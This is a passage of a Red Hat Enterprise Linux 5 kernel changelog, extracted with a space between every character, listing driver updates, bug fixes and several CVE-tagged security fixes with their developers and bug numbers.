5 1 8 1 0 3 ] b r > - [ p c i ] i n t e l - i o m m u : a d d 2 . 6 . 3 2 - r c 4 s w a n d h w p a s s - t h r o u g h ( D o n D u t i l e ) [ 5 1 6 8 1 1 5 1 8 1 0 3 ] b r > - [ p c i ] i n t e l - i o m m u : I O T L B f l u s h i n g m o d s & A T S R s u p p o r t ( D o n D u t i l e ) [ 5 1 6 8 1 1 5 1 8 1 0 3 ] b r > - [ a i o ] i m p l e m e n t r e q u e s t b a t c h i n g ( J e f f M o y e r ) [ 5 3 2 7 6 9 ] b r > - [ n e t ] n e t x e n : f u r t h e r p 3 u p d a t e s f o r r h e l 5 . 5 ( M a r c u s B a r r o w ) [ 5 4 2 7 4 6 ] b r > - [ n e t ] n e t x e n : d r i v e r u p d a t e s f r o m 2 . 6 . 3 2 ( M a r c u s B a r r o w ) [ 5 1 6 8 3 3 ] b r > - [ n e t ] n e t x e n : d r i v e r u p d a t e s f r o m 2 . 6 . 3 1 ( M a r c u s B a r r o w ) [ 5 1 6 8 3 3 ] b r > - [ x e n ] p a s s t h r o u g h m s i - x m a s k b i t a c c e l e r a t i o n ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > - [ x e n ] c h a n g e i n t e r f a c e o f h v m _ m m i o _ a c c e s s ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > - [ x e n ] f i x m s i - x t a b l e f i x m a p a l l o c a t i o n ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > - [ x e n ] f i x w / s a t a s e t t o i d e c o m b i n e d m o d e o n a m d ( B h a v n a S a r a t h y ) [ 5 4 4 0 2 1 ] b r > - [ x e n ] d o m U i r q r a t e l i m i t i n g ( D o n D u g g e r ) [ 5 2 4 7 4 7 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 9 . e l 5 ] b r > - [ s c s i ] s t : d i s p l a y c u r r e n t s e t t i n g s o f o p t i o n b i t s ( T o m C o u g h l a n ) [ 5 0 1 0 3 0 ] b r > - [ p c i ] A E R : p r e v e n t e r r o r s b e i n g r e p o r t e d m u l t i p l e t i m e s ( P r a r i t B h a r g a v a ) [ 5 4 4 9 2 3 ] b r > - [ c i f s ] N U L L o u t p o i n t e r s w h e n c h a s i n g D F S r e f e r r a l s ( J e f f L a y t o n ) [ 5 4 4 4 1 7 ] b r > - [ f b f r o n t ] x e n f b : d o n t r e c r e a t e t h r e a d o n e v e r y r e s t o r e ( C h r i s t o p h e r L a l a n c e t t e ) [ 5 4 1 3 2 5 ] b r > - [ n e t ] i g b : u p d a t e i g b d r i v e r t o s u p p o r t b a r t o n h i l l s ( S t e f a n A s s m a n n ) [ 5 1 3 7 1 0 ] b r > - [ f s ] h f s : f i x a p o t e n t i a l b u f f e r o v e r f l o w ( A m e r i g o W a n g ) [ 5 4 0 7 4 1 ] { C V E - 2 0 0 9 - 4 0 2 0 } b r > - [ f u s e ] p r e v e n t f u s e _ p u t _ r e q u e s t o n i n v a l i d p o i n t e r ( D a n n y F e n g ) [ 5 3 8 7 3 7 ] { C V E - 2 0 0 9 - 4 0 2 1 } b r > - [ s c s i ] l p f c : u p d a t e v e r s i o n f r o m 8 . 2 . 0 . 5 8 t o 8 . 2 . 0 . 5 9 ( R o b E v e r s ) [ 5 2 9 2 4 4 ] b r > - [ s c s i ] l p f c : u p d a t e v e r s i o n f r o m 8 . 2 . 0 . 5 5 t o 8 . 2 . 0 . 5 8 ( R o b E v e r s ) [ 5 1 6 5 4 1 5 2 9 2 4 4 ] b r > - [ s c s i ] l p f c : u p d a t e v e r s i o n f r o m 8 . 2 . 0 . 5 2 t o 8 . 2 . 0 . 5 5 ( R o b E v e r s ) [ 5 2 9 2 4 4 ] b r > - [ s c s i ] p m c r a i d : m i n o r d r i v e r u p d a t e f o r r h e l 5 . 5 ( R o b E v e r s ) [ 5 2 9 9 7 9 ] b r > - [ s c s i ] a d d p m c r a i d d r i v e r ( R o b E v e r s ) [ 5 2 9 9 7 9 ] b r > - [ s c s i ] b f a : b r o c a d e b f a f i b r e - c h a n n e l / f c o e d r i v e r ( R o b E v e r s ) [ 4 7 5 6 9 5 ] b r > - [ m d ] s u p p o r t o r i g i n s i z e c h u n k s i z e ( M i k u l a s P a t o c k a ) [ 5 0 2 9 6 5 ] b r > - [ m d ] l o c k s n a p s h o t w h i l e r e a d i n g s t a t u s ( M i k u l a s P a t o c k a ) [ 5 4 3 3 0 7 ] b r > - [ m d ] f i x d e a d l o c k i n d e v i c e m a p p e r m u l t i p a t h ( M i k u l a s P a t o c k a ) [ 5 4 3 2 7 0 ] b r > - [ m d ] r a i d 5 : m a r k c a n c e l l e d r e a d a h e a d b i o s w i t h - E I O ( E r i c S a n d e e n ) [ 5 1 2 5 5 2 ] b r > - [ f s ] e x t 2 : c o n v e r t t o n e w a o p s ( J o s e f B a c i k ) [ 5 1 3 1 3 6 ] b r > - [ f s ] j b d : f i x r a c e i n s l a b c r e a t i o n / d e l e t i o n ( J o s e f B a c i k ) [ 4 9 6 8 4 7 ] b r > - [ n e t ] e n i c : u p d a t e t o u p s t r e a m v e r s i o n 1 . 1 . 0 . 1 0 0 ( A n d y G o s p o d a r e k ) [ 5 1 9 0 8 6 ] b r > - [ s c s i ] m e g a r a i d : m a k e d r i v e r l e g a c y I / O p o r t f r e e ( T o m a s H e n z l ) [ 5 1 5 8 6 3 ] b r > - [ s c s i ] m e g a r a i d : u p g r a d e t o v e r s i o n 4 . 1 7 - R H 1 ( T o m a s H e n z l ) [ 5 1 8 2 4 3 ] b r > - [ n e t ] i p v s : s y n c h r o n i z e c l o s i n g o f c o n n e c t i o n s ( D a n n y F e n g ) [ 4 9 2 9 4 2 ] b r > - [ f s ] d l m : f i x c o n n e c t i o n c l o s e h a n d l i n g ( D a v i d T e i g l a n d ) [ 5 2 1 0 9 3 ] b r > - [ h w m o n ] a d d s u p p o r t f o r s y l e u s c h i p t o f s c h m d d r i v e r ( D e a n N e l s o n ) [ 5 1 3 1 0 1 ] b r > - [ s 3 9 0 ] d a s d : f i x D I A G a c c e s s f o r r e a d - o n l y d e v i c e s ( H e n d r i k B r u e c k n e r ) [ 5 3 7 8 5 9 ] b r > - [ a c p i ] b a c k p o r t s u p p o r t f o r A C P I 4 . 0 p o w e r m e t e r i n g ( M a t t h e w G a r r e t t ) [ 5 1 4 9 2 3 ] b r > - [ s c s i ] m p t 2 s a s : u s e s e l e c t e d r e g i o n s ( T o m a s H e n z l ) [ 5 1 6 7 0 2 ] b r > - [ s c s i ] m p t 2 s a s : u p g r a d e t o 0 1 . 1 0 1 . 0 6 . 0 0 ( T o m a s H e n z l ) [ 5 1 6 7 0 2 ] b r > - [ b l o c k ] b l k t r a c e : o n l y t e a r d o w n o u r o w n d e b u g / b l o c k ( E r i c S a n d e e n ) [ 4 9 8 4 8 9 ] b r > - R e v e r t : [ s c s i ] f i x i n c o n s i s t e n t u s a g e o f m a x _ l u n ( D a v i d M i l b u r n ) [ 5 3 1 4 8 8 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 8 . e l 5 ] b r > - [ x 8 6 ] f i x s t a l e d a t a i n s h a r e d _ c p u _ m a p c p u m a s k s ( P r a r i t B h a r g a v a ) [ 5 4 1 9 5 3 ] b r > - [ m m ] c a l l v f s _ c h e c k _ f r o z e n a f t e r u n l o c k i n g t h e s p i n l o c k ( A m e r i g o W a n g ) [ 5 4 1 9 5 6 ] b r > - [ m d ] f i x d a t a c o r r u p t i o n w i t h d i f f e r e n t c h u n k s i z e s ( M i k u l a s P a t o c k a ) [ 2 1 0 4 9 0 ] b r > - [ m d ] f i x s n a p s h o t c r a s h o n i n v a l i d a t i o n ( M i k u l a s P a t o c k a ) [ 4 6 1 5 0 6 ] b r > - [ n e t ] c x g b 3 : f i x p o r t i n d e x i s s u e ( D o u g L e d f o r d ) [ 5 1 6 9 4 8 ] b r > - [ n e t ] c x g b 3 : c o r r e c t h e x / d e c i m a l e r r o r ( D o u g L e d f o r d ) [ 5 1 6 9 4 8 ] b r > - [ n e t ] m l x 4 _ e n : a d d a p c i i d t a b l e ( D o u g L e d f o r d ) [ 5 0 8 7 7 0 ] b r > - [ i n f i n i b a n d ] n u l l o u t s k b p o i n t e r s o n e r r o r ( D o u g L e d f o r d ) [ 5 3 1 7 8 4 ] b r > - [ i n f i n i b a n d ] i n i t n e i g h - > d g i d . r a w o n b o n d i n g e v e n t s ( D o u g L e d f o r d ) [ 5 3 8 0 6 7 ] b r > - [ n f s ] a d d a n n f s i o d w o r k q u e u e ( I a n K e n t ) [ 4 8 9 9 3 1 ] b r > - [ n f s ] n f s i o d : e n s u r e t h e a s y n c h r o n o u s R P C c a l l s c o m p l e t e ( I a n K e n t ) [ 4 8 9 9 3 1 ] b r > - [ n f s ] s u n r p c : a l l o w r p c _ r e l e a s e ( ) C B r u n o n a n o t h e r w o r k q ( I a n K e n t ) [ 4 8 9 9 3 1 ] b r > - [ n f s ] f i x a d e a d l o c k w i t h l a z y u m o u n t - 2 ( I a n K e n t ) [ 4 8 9 9 3 1 ] b r > - [ n f s ] f i x a d e a d l o c k w i t h l a z y u m o u n t ( I a n K e n t ) [ 4 8 9 9 3 1 ] b r > - [ f s ] e x t 3 / 4 : f r e e j o u r n a l b u f f e r s ( E r i c S a n d e e n ) [ 5 0 6 2 1 7 ] b r > - [ n e t ] r e s o l v e i s s u e s w i t h v l a n c r e a t i o n a n d f i l t e r i n g ( A n d y G o s p o d a r e k ) [ 5 2 1 3 4 5 ] b r > - [ s c s i ] s t e x : u p d a t e d r i v e r f o r R H E L - 5 . 5 ( D a v i d M i l b u r n ) [ 5 1 6 8 8 1 ] b r > - [ s c s i ] b e 2 i s c s i : a d d d r i v e r t o g e n e r i c c o n f i g ( M i k e C h r i s t i e ) [ 5 1 5 2 8 4 ] b r > - [ s c s i ] a d d b e 2 i s c s i d r i v e r ( M i k e C h r i s t i e ) [ 5 1 5 2 8 4 ] b r > - [ f s ] e x t 4 : u p d a t e t o 2 . 6 . 3 2 c o d e b a s e ( E r i c S a n d e e n ) [ 5 2 8 0 5 4 ] b r > - [ s c s i ] d i s a b l e s t a t e t r a n s i t i o n f r o m O F F L I N E t o R U N N I N G ( T a k a h i r o Y a s u i ) [ 5 1 6 9 3 4 ] b r > - [ s c s i ] f u s i o n : u p d a t e m p t d r i v e r t o 3 . 4 . 1 3 r h ( T o m a s H e n z l ) [ 5 1 6 7 1 0 ] b r > - [ n e t ] g r o : f i x i l l e g a l m e r g i n g o f t r a i l e r t r a s h ( H e r b e r t X u ) [ 5 3 7 8 7 6 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 7 . e l 5 ] b r > - [ s c s i ] g d t h : p r e v e n t n e g a t i v e o f f s e t s i n i o c t l ( A m e r i g o W a n g ) [ 5 3 9 4 2 1 ] { C V E - 2 0 0 9 - 3 0 8 0 } b r > - [ n e t ] i x g b e : a d d a n d e n a b l e C O N F I G _ I X G B E _ D C A ( A n d y G o s p o d a r e k ) [ 5 1 4 3 0 6 ] b r > - [ n e t ] i x g b e : u p d a t e t o u p s t r e a m v e r s i o n 2 . 0 . 4 4 - k 2 ( A n d y G o s p o d a r e k ) [ 5 1 3 7 0 7 5 1 4 3 0 6 5 1 6 6 9 9 ] b r > - [ c i f s ] d u p l i c a t e d a t a o n a p p e n d i n g t o s o m e s a m b a s e r v e r s ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ s 3 9 0 ] k e r n e l : f i x s i n g l e s t e p p i n g o n s v c 0 ( H e n d r i k B r u e c k n e r ) [ 5 4 0 5 2 7 ] b r > - [ f s ] g f s 2 : f i x g l o c k r e f c o u n t i s s u e s ( S t e v e n W h i t e h o u s e ) [ 5 3 9 2 4 0 ] b r > - [ v b d ] x e n : f i x c r a s h a f t e r b a l l o o n i n g ( C h r i s t o p h e r L a l a n c e t t e ) [ 5 4 0 8 1 1 ] b r > - [ b l o c k ] c f q - i o s c h e d : g e t r i d o f c f q q h a s h ( J e f f M o y e r ) [ 4 2 7 7 0 9 4 4 8 1 3 0 4 5 6 1 8 1 ] b r > - [ s c s i ] d e v i n f o u p d a t e f o r h i t a c h i e n t r i e s f o r R H E L 5 . 5 ( T a k a h i r o Y a s u i ) [ 4 3 0 6 3 1 ] b r > - [ n e t ] c a l l c o n d _ r e s c h e d i n r t _ r u n _ f l u s h ( A m e r i g o W a n g ) [ 5 1 7 5 8 8 ] b r > - [ c i f s ] u p d a t e c i f s v e r s i o n n u m b e r ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] a v o i d i n v a l i d k f r e e i n c i f s _ g e t _ t c p _ s e s s i o n ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] f i x b r o k e n m o u n t s w h e n a S S H t u n n e l i s u s e d ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] f i x m e m o r y l e a k i n n t l m v 2 h a s h c a l c u l a t i o n ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] f i x p o t e n t i a l N U L L d e r e f i n p a r s e _ D F S _ r e f e r r a l s ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] f i x r e a d b u f f e r o v e r f l o w ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] f r e e n a t i v e F i l e S y s t e m b e f o r e a l l o c a t i n g n e w o n e ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] a d d a d d r = m o u n t o p t i o n a l i a s f o r i p = ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] c o p y s t r u c t * a f t e r * s e t t i n g p o r t , n o t b e f o r e ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ c i f s ] f i x a r t i f i c i a l l i m i t o n r e a d i n g s y m l i n k s ( J e f f L a y t o n ) [ 5 0 0 8 3 8 ] b r > - [ s c s i ] m e g a r a i d : f i x s a s p e r m i s s i o n s i n s y s f s ( C a s e y D a h l i n ) [ 5 3 7 3 1 3 ] { C V E - 2 0 0 9 - 3 8 8 9 C V E - 2 0 0 9 - 3 9 3 9 } b r > - [ c p u f r e q ] a v o i d p l a y i n g w i t h c p u s _ a l l o w e d i n p o w e r n o w - k 8 ( A l e x C h i a n g ) [ 5 2 3 5 0 5 ] b r > - [ c p u f r e q ] c h a n g e c p u f r e q a r r a y s t o p e r _ c p u v a r i a b l e s ( A l e x C h i a n g ) [ 5 2 3 5 0 5 ] b r > - [ c p u f r e q ] p o w e r n o w - k 8 : g e t d r v d a t a f o r c o r r e c t c p u ( A l e x C h i a n g ) [ 5 2 3 5 0 5 ] b r > - [ c p u f r e q ] x 8 6 : c h a n g e N R _ C P U S a r r a y s i n p o w e r n o w - k 8 ( A l e x C h i a n g ) [ 5 2 3 5 0 5 ] b r > - [ c i f s ] f i x e r r o r h a n d l i n g i n m o u n t - t i m e d f s r e f e r r a l c o d e ( J e f f L a y t o n ) [ 5 1 3 4 1 0 ] b r > - [ c i f s ] a d d l o o p c h e c k w h e n m o u n t i n g d f s t r e e ( J e f f L a y t o n ) [ 5 1 3 4 1 0 ] b r > - [ c i f s ] f i x s o m e b u i l d w a r n i n g s ( J e f f L a y t o n ) [ 5 1 3 4 1 0 ] b r > - [ c i f s ] f i x b u i l d w h e n d f s s u p p o r t n o t e n a b l e d ( J e f f L a y t o n ) [ 5 1 3 4 1 0 ] b r > - [ c i f s ] r e m o t e d f s r o o t s u p p o r t ( J e f f L a y t o n ) [ 5 1 3 4 1 0 ] b r > - [ c i f s ] e n a b l e d f s s u b m o u n t s t o h a n d l e r e m o t e r e f e r r a l s ( J e f f L a y t o n ) [ 5 1 3 4 1 0 ] b r > - [ e d a c ] i 3 2 0 0 _ e d a c : b a c k p o r t d r i v e r t o R H E L 5 . 5 ( M a u r o C a r v a l h o C h e h a b ) [ 4 6 9 9 7 6 ] b r > - [ e d a c ] a d d u p s t r e a m i 3 2 0 0 _ e d a c d r i v e r ( M a u r o C a r v a l h o C h e h a b ) [ 4 6 9 9 7 6 ] b r > - [ c i f s ] n o C I F S G e t S r v I n o d e N u m b e r i n i s _ p a t h _ a c c e s s i b l e ( J e f f L a y t o n ) [ 5 2 9 4 3 1 ] b r > - [ b l o c k ] b l k t r a c e : c o r r e c t l y r e c o r d b l o c k t o a n d f r o m d e v s ( J a s o n B a r o n ) [ 5 1 5 5 5 1 ] b r > - [ s c h e d ] e n a b l e C O N F I G _ D E T E C T _ H U N G _ T A S K s u p p o r t ( A m e r i g o W a n g ) [ 5 0 6 0 5 9 ] b r > - [ x e n ] f i x S R A T c h e c k f o r d i s c o n t i g u o u s m e m o r y ( C h r i s t o p h e r L a l a n c e t t e ) [ 5 1 9 2 2 5 ] b r > - [ x e n ] i m p l e m e n t f u l l y p r e e m p t i b l e p a g e t a b l e t e a r d o w n ( C h r i s t o p h e r L a l a n c e t t e ) [ 5 1 0 0 3 7 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 6 . e l 5 ] b r > - [ x e n ] m a s k e x t e n d e d t o p o c p u i d f e a t u r e ( A n d r e w J o n e s ) [ 5 3 3 2 9 2 ] b r > - [ f s ] p i p e . c n u l l p o i n t e r d e r e f e r e n c e ( J e f f M o y e r ) [ 5 3 0 9 3 9 ] { C V E - 2 0 0 9 - 3 5 4 7 } b r > - [ x e n ] c d - r o m d r i v e d o e s n o t r e c o g n i z e n e w m e d i a ( M i r o s l a v R e z a n i n a ) [ 2 2 1 6 7 6 ] b r > - [ n f s ] f i x s t a l e n f s _ f a t t r p a s s e d t o n f s _ r e a d d i r _ l o o k u p ( H a r s h u l a J a y a s u r i y a ) [ 5 3 1 0 1 6 ] b r > - [ s p e c ] s 3 9 0 : e n a b l e k e r n e l m o d u l e s i g n i n g ( D o n Z i c k u s ) [ 4 8 3 6 6 5 ] b r > - [ n f s ] b r i n g n f s 4 a c l i n t o l i n e w i t h m a i n l i n e c o d e ( J e f f L a y t o n ) [ 4 7 9 8 7 0 5 3 0 5 7 5 ] b r > - [ i a 6 4 ] k d u m p : r e s t o r e r e g i s t e r s i n t h e s t a c k o n i n i t ( T a k a o I n d o h ) [ 5 1 5 7 5 3 ] b r > - [ n f s ] n f s d 4 : d o e x a c t c h e c k o f a t t r i b u t e s p e c i f i e d ( J e f f L a y t o n ) [ 5 1 2 3 6 1 ] b r > - [ n e t ] i g b : a d d s u p p o r t f o r 8 2 5 7 6 n s s e r d e s a d a p t e r ( S t e f a n A s s m a n n ) [ 5 1 7 0 6 3 ] b r > - [ s 3 9 0 ] z f c p _ s c s i : d y n a m i c q u e u e d e p t h a d j u s t m e n t p a r a m ( P e t e Z a i t c e v ) [ 5 0 8 3 5 5 ] b r > - [ s c s i ] f i x i n c o n s i s t e n t u s a g e o f m a x l u n ( D a v i d M i l b u r n ) [ 5 3 1 4 8 8 ] b r > - [ i p m i ] f i x i p m i _ s i m o d p r o b e h a n g ( T o n y C a m u s o ) [ 5 0 7 4 0 2 ] b r > - [ x 8 6 ] k v m : d o n t a s k H V f o r t s c k h z i f n o t u s i n g k v m c l o c k ( G l a u b e r C o s t a ) [ 5 3 1 2 6 8 ] b r > - [ n e t ] q l g e : u p d a t e s a n d f i x e s f o r R H E L - 5 . 5 ( M a r c u s B a r r o w ) [ 5 1 9 4 5 3 ] b r > - [ n e t ] i g b : f i x k e x e c w i t h i g b c o n t r o l l e r ( S t e f a n A s s m a n n ) [ 5 2 7 4 2 4 ] b r > - [ n e t ] q l g e : f i x c r a s h w i t h k v m g u e s t d e v i c e p a s s t h r u ( M a r c u s B a r r o w ) [ 5 0 7 6 8 9 ] b r > - [ m i s c ] h p i l o : a d d p o l l i n g m e c h a n i s m ( T o n y C a m u s o ) [ 5 1 5 0 1 0 ] b r > - [ m i s c ] h p i l o : a d d i n t e r r u p t h a n d l e r ( T o n y C a m u s o ) [ 5 1 5 0 1 0 ] b r > - [ m i s c ] h p i l o : s t a g i n g f o r i n t e r r u p t h a n d l i n g ( T o n y C a m u s o ) [ 5 1 5 0 1 0 ] b r > - [ e d a c ] a m d 6 4 _ e d a c : e n a b l e d r i v e r i n k e r n e l c o n f i g ( B h a v n a S a r a t h y ) [ 4 7 9 0 7 0 ] b r > - [ e d a c ] a m d 6 4 _ e d a c : r e m o v e e a r l y h a r d w a r e p r o b e ( B h a v n a S a r a t h y ) [ 4 7 9 0 7 0 ] b r > - [ e d a c ] a m d 6 4 _ e d a c : d e t e c t d d r 3 s u p p o r t ( B h a v n a S a r a t h y ) [ 4 7 9 0 7 0 ] b r > - [ e d a c ] a m d 6 4 _ e d a c : a d d d d r 3 s u p p o r t ( B h a v n a S a r a t h y ) [ 4 7 9 0 7 0 ] b r > - [ e d a c ] a d d a m d 6 4 _ e d a c d r i v e r ( B h a v n a S a r a t h y ) [ 4 7 9 0 7 0 ] b r > - [ n e t ] i g b : s e t v f r l p m l m u s t t a k e v l a n t a g i n t o a c c o u n t ( D o n D u g g e r ) [ 5 1 5 6 0 2 ] b r > - [ m i s c ] h i b e r n a t e : i n c r e a s e t i m e o u t ( M a t t h e w G a r r e t t ) [ 5 0 7 3 3 1 ] b r > - [ n f s ] m a k e s u r e d p r i n t k ( ) m a c r o w o r k s e v e r y w h e r e ( J e f f L a y t o n ) [ 5 3 2 7 0 1 ] b r > - [ a c p i ] i n c l u d e c o r e w m i s u p p o r t a n d d e l l - w m i d r i v e r ( M a t t h e w G a r r e t t ) [ 5 1 6 6 2 3 ] b r > - [ p o w e r p c ] f i x t o h a n d l e S L B r e s i z e d u r i n g m i g r a t i o n ( K e v i n M o n r o e ) [ 5 2 4 1 1 2 ] b r > - [ m m ] o o m k i l l e r o u t p u t s h o u l d d i s p l a y U I D ( L a r r y W o o d m a n ) [ 5 2 0 4 1 9 ] b r > - [ n e t ] f i x r a c e i n d a t a r e c e i v e / s e l e c t ( A m e r i g o W a n g ) [ 5 0 9 8 6 6 ] b r > - [ n e t ] a u g m e n t r a w _ s e n d _ h d r i n c t o v a l i d a t e i h l i n u s e r h d r ( N e i l H o r m a n ) [ 5 0 0 9 2 4 ] b r > - [ i 2 c ] i n c l u d e s u p p o r t f o r H u d s o n - 2 S M B u s c o n t r o l l e r ( S t a n i s l a w G r u s z k a ) [ 5 1 5 1 2 5 ] b r > - [ n e t ] b o n d i n g : i n t r o d u c e p r i m a r y _ r e s e l e c t o p t i o n ( J i r i P i r k o ) [ 4 7 1 5 3 2 ] b r > - [ n e t ] b o n d i n g : a b _ a r p u s e s t d a c t i v e s l a v e s e l e c t c o d e ( J i r i P i r k o ) [ 4 7 1 5 3 2 ] b r > - [ n e t ] u s e n e t l i n k n o t i f i c a t i o n s t o t r a c k n e i g h b o u r s t a t e s ( D a n n y F e n g ) [ 5 1 6 5 8 9 ] b r > - [ n e t ] i n t r o d u c e g e n e r i c f u n c t i o n _ _ n e i g h _ n o t i f y ( D a n n y F e n g ) [ 5 1 6 5 8 9 ] b r > - [ f s ] s k i p i n o d e s w / o p a g e s t o f r e e i n d r o p _ p a g e c a c h e _ s b ( L a r r y W o o d m a n ) [ 5 2 8 0 7 0 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 5 . e l 5 ] b r > - [ n e t ] b n x 2 x : a d d s u p p o r t f o r b c m 8 7 2 7 p h y ( S t a n i s l a w G r u s z k a ) [ 5 1 5 7 1 6 ] b r > - [ n e t ] s c h e d : f i x p a n i c i n b n x 2 _ p o l l _ w o r k ( J o h n F e e n e y ) [ 5 2 6 4 8 1 ] b r > - [ a c p i ] p r e v e n t d u p l i c a t e d i r s i n / p r o c / a c p i / p r o c e s s o r ( M a t t h e w G a r r e t t ) [ 5 3 7 3 9 5 ] b r > - [ m m ] c o n d i t i o n a l f l u s h i n f l u s h _ a l l _ z e r o _ p k m a p s ( E r i c S a n d e e n ) [ 4 8 4 6 8 3 ] b r > - [ f s ] e c r y p t f s : c o p y l o w e r a t t r s b e f o r e d e n t r y i n s t a n t i a t e ( E r i c S a n d e e n ) [ 4 8 9 7 7 4 ] b r > - [ p p c ] f i x c o m p i l e w a r n i n g s i n e e h c o d e ( P r a r i t B h a r g a v a ) [ 5 3 8 4 0 7 ] b r > - [ m d ] m u l t i p l e d e v i c e f a i l u r e r e n d e r s d m - r a i d 1 u n f i x a b l e ( J o n a t h a n E B r a s s o w ) [ 4 9 8 5 3 2 ] b r > - [ s c s i ] i b m v s c s i : F C o C E E N P I V s u p p o r t ( S t e v e B e s t ) [ 5 1 2 1 9 2 ] b r > - [ f s ] g f s 2 : f i x p o t e n t i a l r a c e i n g l o c k c o d e ( S t e v e n W h i t e h o u s e ) [ 4 9 8 9 7 6 ] b r > - [ k v m ] b a l l o o n d r i v e r f o r g u e s t s ( P e t e r B o g d a n o v i c ) [ 5 2 2 6 2 9 ] b r > - [ s c t p ] a s s i g n t s n s e a r l i e r t o a v o i d r e o r d e r i n g ( N e i l H o r m a n ) [ 5 1 7 5 0 4 ] b r > - [ x 8 6 ] f i x b o o t c r a s h w i t h 8 - c o r e A M D M a g n y - c o u r s s y s t e m ( B h a v n a S a r a t h y ) [ 5 2 2 2 1 5 ] b r > - [ x 8 6 ] s u p p o r t a m d m a g n y - c o u r s p o w e r - a w a r e s c h e d u l e r f i x ( B h a v n a S a r a t h y ) [ 5 1 3 6 8 5 ] b r > - [ x 8 6 ] c p u : u p s t r e a m c a c h e f i x e s n e e d e d f o r a m d m - c ( B h a v n a S a r a t h y ) [ 5 2 6 3 1 5 ] b r > - [ x 8 6 _ 6 4 ] s e t p r o c i d a n d c o r e i d b e f o r e c a l l i n g f i x u p _ d c m ( B h a v n a S a r a t h y ) [ 5 2 6 3 1 5 ] b r > - [ x 8 6 ] d i s a b l e N M I w a t c h d o g o n C P U r e m o v e ( P r a r i t B h a r g a v a ) [ 5 3 2 5 1 4 ] b r > - [ n f s d ] d o n t a l l o w s e t t i n g c t i m e o v e r v 4 ( J e f f L a y t o n ) [ 4 9 7 9 0 9 ] b r > - [ a c p i ] b m _ c h e c k a n d b m _ c o n t r o l u p d a t e ( L u m i n g Y u ) [ 5 0 9 4 2 2 ] b r > - [ x 8 6 _ 6 4 ] a m d : i o m m u s y s t e m m a n a g e m e n t e r r a t u m 6 3 f i x ( B h a v n a S a r a t h y ) [ 5 3 1 4 6 9 ] b r > - [ n e t ] b n x 2 i / c n i c : u p d a t e d r i v e r v e r s i o n f o r R H E L 5 . 5 ( M i k e C h r i s t i e ) [ 5 1 6 2 3 3 ] b r > - [ x 8 6 ] f i x L 1 c a c h e b y a d d i n g m i s s i n g b r e a k ( B h a v n a S a r a t h y ) [ 5 2 6 7 7 0 ] b r > - [ x 8 6 ] a m d : f i x h o t p l u g c p u i s s u e o n 3 2 - b i t m a g n y - c o u r s ( B h a v n a S a r a t h y ) [ 5 2 6 7 7 0 ] b r > - [ a c p i ] d i s a b l e A R B _ D I S A B L E o n p l a t f o r m s w h e r e n o t n e e d e d ( L u m i n g Y u ) [ 5 0 9 4 2 2 ] b r > - [ s 3 9 0 ] d o n o t a n n o t a t e c m d l i n e a s _ _ i n i t d a t a ( H e n d r i k B r u e c k n e r ) [ 5 0 6 8 9 8 ] b r > - [ x 8 6 _ 6 4 ] f i x 3 2 - b i t p r o c e s s r e g i s t e r l e a k ( A m e r i g o W a n g ) [ 5 2 6 7 9 8 ] b r > - [ m i s c ] d o n t c a l l p r i n t k w h i l e c r a s h i n g ( M a u r o C a r v a l h o C h e h a b ) [ 4 9 7 1 9 5 ] b r > - [ x 8 6 ] m c e _ a m d : f i x u p t h r e s h o l d _ b a n k 4 c r e a t i o n ( B h a v n a S a r a t h y ) [ 5 2 6 3 1 5 ] b r > - [ p c i ] f i x S R - I O V f u n c t i o n d e p e n d e n c y l i n k p r o b l e m ( D o n D u g g e r ) [ 5 0 3 8 3 7 ] b r > - [ x e n ] f i x n u m a o n m a g n y - c o u r s s y s t e m s ( B h a v n a S a r a t h y ) [ 5 2 6 0 5 1 ] b r > - [ x e n ] a d d t w o H P P r o L i a n t D M I q u i r k s t o t h e h y p e r v i s o r ( P a o l o B o n z i n i ) [ 5 3 6 6 7 7 ] b r > - [ x e n ] h o o k s c h e d r e b a l a n c e l o g i c t o o p t _ h a r d v i r t ( C h r i s t o p h e r L a l a n c e t t e ) [ 5 2 9 2 7 1 ] b r > - [ x e n ] c r a n k t h e c o r r e c t s t a t i n t h e s c h e d u l e r ( C h r i s t o p h e r L a l a n c e t t e ) [ 5 2 9 2 7 1 ] b r > - [ x e n ] w h i t e s p a c e f i x u p s i n x e n s c h e d u l e r ( C h r i s t o p h e r L a l a n c e t t e ) [ 5 2 9 2 7 1 ] b r > - [ x e n ] f i x c r a s h w i t h m e m o r y i m b a l a n c e ( B h a v n a S a r a t h y ) [ 5 2 6 7 8 5 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 4 . e l 5 ] b r > - [ f s ] p r i v a t e d e n t r y l i s t t o a v o i d d c a c h e _ l o c k c o n t e n t i o n ( L a c h l a n M c I l r o y ) [ 5 2 6 6 1 2 ] b r > - [ g f s 2 ] d r o p r i n d e x g l o c k o n g r o w s ( B e n j a m i n M a r z i n s k i ) [ 4 8 2 7 5 6 ] b r > - [ a c p i ] r u n e v e n t s o n c p u 0 ( M a t t h e w G a r r e t t ) [ 4 8 5 0 1 6 ] b r > - [ c p u f r e q ] a d d o p t i o n t o a v o i d s m i w h i l e c a l i b r a t i n g ( M a t t h e w G a r r e t t ) [ 5 1 3 6 4 9 ] b r > - [ a c p i ] s u p p o r t p h y s i c a l c p u h o t p l u g o n x 8 6 _ 6 4 ( S t e f a n A s s m a n n ) [ 5 1 6 9 9 9 ] b r > - [ s c s i ] q l a 2 x x x : e n a b l e 